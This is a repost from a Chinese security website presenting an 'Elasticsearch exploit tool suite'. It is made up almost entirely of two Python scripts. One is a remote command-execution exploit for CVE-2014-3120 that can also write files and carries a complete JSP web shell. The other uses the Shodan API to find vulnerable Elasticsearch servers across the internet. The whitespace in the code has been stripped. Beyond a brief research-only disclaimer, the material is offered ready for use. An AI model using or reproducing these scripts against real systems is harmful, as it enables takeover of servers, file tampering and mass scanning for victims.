未加星标

elasticsearch 漏洞利用工具套装

字体大小 | |
[工具软件 所属分类 工具软件 | 发布者 店小二05 | 时间 2015 | 作者 胖和尚 ] 0人收藏点击收藏

ElasticSearch是一个基于Lucene构建的开源,分布式,RESTful搜索引擎。设计用于云计算中,能够达到实时搜索,稳定,可靠,快速,安装使用方便。支持通过HTTP使用JSON进行数据索引。


elasticsearch 漏洞利用工具套装

elasticsearch 漏洞利用工具套装

请勿用于非法用途,只供漏洞研究之用

因该脚本造成法律问题,作者概不负责,如果违反相关规定,请通知管理员删除该文章

exp:post提交 支持文件上传功能

exp.py

#!/usr/bin/envpython
#byheshangha.cker@me.com
#-*-coding:utf-8-*-
importhttplib
importurllib,urllib2
importsimplejson
importstring
importsys
fromoptparseimportOptionParser
print'ElasticsearchExpLoitByHeshang'
print'2014-06-23'
options=OptionParser(usage='%progip[port][command]',description='elasticsearchcommandexecexploit(CVE-2014-3120)')
options.add_option('-p','--port',type='int',default='9200',help='Theelasticsearchport(default:9200)')
options.add_option('-c','--cmd',type='str',default='whoami',help='commandtotest(default:whoami)')
options.add_option('-P','--path',type='str',default='',help='Uploadfile\'spath')
defpost(ip,port,exp):
ip=ip
port=port
path=''
exp=exp
data={
"size":1,
"query":{
"filtered":{
"query":{
"match_all":{}
}
}
},
"script_fields":{
"exp":{
"script":exp
}
}
}
data=simplejson.dumps(data)
headers={"User-agent":"Mozilla/5.0(windows;U;WindowsNT6.0;en-US;rv:1.9.2)Gecko/20100115Firefox/3.6)",
"Accept":"ext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Content-Type":"application/json;charset=utf-8",
"Connection":"keep-alive"}
conn=httplib.HTTPConnection('%s'%ip+':'+'%d'%port)
conn.request('POST','/_search?source',data,headers)
result=conn.getresponse().read()
returnresult
defexec_command(ip,port,cmd):
ip=ip
port=port
cmd=cmd
exp='importjava.util.*;\nimportjava.io.*;\nStringstr=\"\";BufferedReaderbr=newBufferedReader(newInputStreamReader(Runtime.getRuntime().exec(\"'+cmd+'\").getInputStream()));StringBuildersb=newStringBuilder();while((str=br.readLine())!=null){sb.append(str+\"|");}sb.toString();'
rs=post(ip,port,exp)
returnrs
defsave_file(ip,port,path):
ip=ip
port=port
path=path
upload='testtesttest'
#upload='<%@pageimport="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!StringPwd="xxxxx";Stringcs="UTF-8";StringEC(Strings)throwsException{returnnewString(s.getBytes("ISO-8859-1"),cs);}ConnectionGC(Strings)throwsException{String[]x=s.trim().split("\r\n");Class.forName(x[0].trim());if(x[1].indexOf("jdbc:oracle")!=-1){returnDriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);}else{Connectionc=DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);if(x.length>4){c.setCatalog(x[4]);}returnc;}}voidAA(StringBuffersb)throwsException{Filer[]=File.listRoots();for(inti=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}voidBB(Strings,StringBuffersb)throwsException{FileoF=newFile(s),l[]=oF.listFiles();StringsT,sQ,sF="";java.util.Datedt;SimpleDateFormatfm=newSimpleDateFormat("yyyy-MM-ddHH:mm:ss");for(inti=0;i<l.length;i++){dt=newjava.util.Date(l[i].lastModified());sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?"W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}voidEE(Strings)throwsException{Filef=newFile(s);if(f.isDirectory()){Filex[]=f.listFiles();for(intk=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}voidFF(Strings,HttpServletResponser)throwsException{intn;byte[]b=newbyte[512];r.reset();ServletOutputStreamos=r.getOutputStream();BufferedInputStreamis=newBufferedInputStream(newFileInputStream(s));os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}voidGG(Strings,Stringd)throwsException{Stringh="0123456789ABCDEF";Filef=newFile(s);f.createNewFile();FileOutputStreamos=newFileOutputStream(f);for(inti=0;i<d.length();i+=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}voidHH(Strings,Stringd)throwsException{Filesf=newFile(s),df=newFile(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}Filez[]=sf.listFiles();for(intj=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}}else{FileInputStreamis=newFileInputStream(sf);FileOutputStreamos=newFileOutputStream(df);intn;byte[]b=newbyte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}voidII(Strings,Stringd)throwsException{Filesf=newFile(s),df=newFile(d);sf.renameTo(df);}voidJJ(Strings)throwsException{Filef=newFile(s);f.mkdir();}voidKK(Strings,Stringt)throwsException{Filef=newFile(s);SimpleDateFormatfm=newSimpleDateFormat("yyyy-MM-ddHH:mm:ss");java.util.Datedt=fm.parse(t);f.setLastModified(dt.getTime());}voidLL(Strings,Stringd)throwsException{URLu=newURL(s);intn=0;FileOutputStreamos=newFileOutputStream(d);HttpURLConnectionh=(HttpURLConnection)u.openConnection();InputStreamis=h.getInputStream();byte[]b=newbyte[512];while((n=is.read(b))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}voidMM(InputStreamis,StringBuffersb)throwsException{Stringl;BufferedReaderbr=newBufferedReader(newInputStreamReader(is));while((l=br.readLine())!=null){sb.append(l+"\r\n");}}voidNN(Strings,StringBuffersb)throwsException{Connectionc=GC(s);ResultSetr=s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}voidOO(Strings,StringBuffersb)throwsException{Connectionc=GC(s);String[]x=s.trim().split("\r\n");ResultSetr=c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null,"%",newString[]{"TABLE"});while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}voidPP(Strings,StringBuffersb)throwsException{String[]x=s.trim().split("\r\n");Connectionc=GC(s);Statementm=c.createStatement(1005,1007);ResultSetr=m.executeQuery("select*from"+x[x.length-1]);ResultSetMetaDatad=r.getMetaData();for(inti=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+"("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}voidQQ(Stringcs,Strings,Stringq,StringBuffersb,Stringp)throwsException{Connectionc=GC(s);Statementm=c.createStatement(1005,1008);BufferedWriterbw=null;try{ResultSetr=m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);ResultSetMetaDatad=r.getMetaData();intn=d.getColumnCount();for(inti=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");}sb.append("\r\n");if(q.indexOf("--f:")!=-1){Filefile=newFile(p);if(q.indexOf("-to:")==-1){file.mkdir();}bw=newBufferedWriter(newOutputStreamWriter(newFileOutputStream(newFile(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:")+4,q.length()).trim()),true),cs));}while(r.next()){for(inti=1;i<=n;i++){if(q.indexOf("--f:")!=-1){bw.write(r.getObject(i)+""+"\t");bw.flush();}else{sb.append(r.getObject(i)+""+"\t|\t");}}if(bw!=null){bw.newLine();}sb.append("\r\n");}r.close();if(bw!=null){bw.close();}}catch(Exceptione){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("ExecuteSuccessfully!\t|\t\r\n");}catch(Exceptionee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}%><%cs=request.getParameter("z0")!=null?request.getParameter("z0")+"":cs;response.setContentType("text/html");response.setCharacterEncoding(cs);StringBuffersb=newStringBuffer("");try{StringZ=EC(request.getParameter(Pwd)+"");Stringz1=EC(request.getParameter("z1")+"");Stringz2=EC(request.getParameter("z2")+"");sb.append("->"+"|");Strings=request.getSession().getServletContext().getRealPath("/");if(Z.equals("A")){sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}elseif(Z.equals("B")){BB(z1,sb);}elseif(Z.equals("C")){Stringl="";BufferedReaderbr=newBufferedReader(newInputStreamReader(newFileInputStream(newFile(z1))));while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}elseif(Z.equals("D")){BufferedWriterbw=newBufferedWriter(newOutputStreamWriter(newFileOutputStream(newFile(z1))));bw.write(z2);bw.close();sb.append("1");}elseif(Z.equals("E")){EE(z1);sb.append("1");}elseif(Z.equals("F")){FF(z1,response);}elseif(Z.equals("G")){GG(z1,z2);sb.append("1");}elseif(Z.equals("H")){HH(z1,z2);sb.append("1");}elseif(Z.equals("I")){II(z1,z2);sb.append("1");}elseif(Z.equals("J")){JJ(z1);sb.append("1");}elseif(Z.equals("K")){KK(z1,z2);sb.append("1");}elseif(Z.equals("L")){LL(z1,z2);sb.append("1");}elseif(Z.equals("M")){String[]c={z1.substring(2),z1.substring(0,2),z2};Processp=Runtime.getRuntime().exec(c);MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}elseif(Z.equals("N")){NN(z1,sb);}elseif(Z.equals("O")){OO(z1,sb);}elseif(Z.equals("P")){PP(z1,sb);}elseif(Z.equals("Q")){QQ(cs,z1,z2,sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\","/")+"images/");}}catch(Exceptione){sb.append("ERROR"+"://"+e.toString());}sb.append("|"+"<-");out.print(sb.toString());%>'
exp='importjava.util.*;\nimportjava.io.*;\nFilef=newFile(\"'+path+'\");if(f.exists()){\"exists\".toString();}BufferedWriterbw=newBufferedWriter(newOutputStreamWriter(newFileOutputStream(f),\"UTF-8\"));bw.write(\"'+upload+'\");bw.flush();bw.close();if(f.exists()){\"success\".toString();}'
rs=post(ip,port,exp)
returnrs
defmain():
opts,args=options.parse_args()
iflen(args)<1:
options.print_help()
return
ifopts.path!="":
exp=save_file(args[0],opts.port,opts.path)
exp=simplejson.loads(exp)
exp=exp['hits']['hits'][0]['fields']['exp']
printexp
elifopts.path=="":
exp=exec_command(args[0],opts.port,opts.cmd)
exp=simplejson.loads(exp)
exp=exp['hits']['hits'][0]['fields']['exp']
s='%s'%exp
s=s.split('|')
foriins:
printi#.decode("unicode_escape")
if__name__=='__main__':
main()

check.py 需要安装shodan模块和shodan api

#!/usr/bin/envpython
#-*-coding:utf-8-*-
#byha.cker@me.com
importtime
importshodan
importsys
importurllib
importsimplejson
importsocket
print'******************************************************'
print'*ElasticsearchvulfoundTool*'
print'*Writebyha.cker@me.com*'
print'*Ucanuseshodanapitosearchthevulhost*'
print'******************************************************'
#Configuration
API_KEY=""#api
defcheck(ip):
ip=ip
socket.setdefaulttimeout(3)
try:
rs=urllib.urlopen('http://'+'%s'%ip+':9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22t%22:{%22script%22:%22Integer.toHexString(31415926)%22}}}}')
rs=rs.read()
rs=simplejson.loads(rs)
except:
pass
try:
fortinrs['hits']['hits'][0]['fields']['t']:
t=t
except:
pass
else:
print'foundvulhost:%s'%ip
defmain():
try:
#Setuptheapi
api=shodan.Shodan(API_KEY)
query='youKnow,for'
foriinrange(1,100):
page=i
try:
result=api.search(query,page)
exceptException,e:
print'Error:%sandsleep10s'%e
time.sleep(10)
pass
else:
forserviceinresult['matches']:
ip=service['ip_str']
ip=str(ip)
check(ip)
#LoopthroughthematchesandprinteachIP
exceptException,e:
print'Error:%sandsleep10s'%e
printi
sys.exit(1)
if__name__=='__main__':
main()
elasticsearch 漏洞利用工具套装

elasticsearch 漏洞利用工具套装

elasticsearch 漏洞利用工具套装

elasticsearch 漏洞利用工具套装
tags: append,close,z1,equals,throwsException,lt,elseif,Strings,ip,newFile,indexOf,null
分页:12
转载请注明
本文标题:elasticsearch 漏洞利用工具套装
本站链接:http://www.codesec.net/view/56568.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 工具软件 | 评论(0) | 阅读(2243)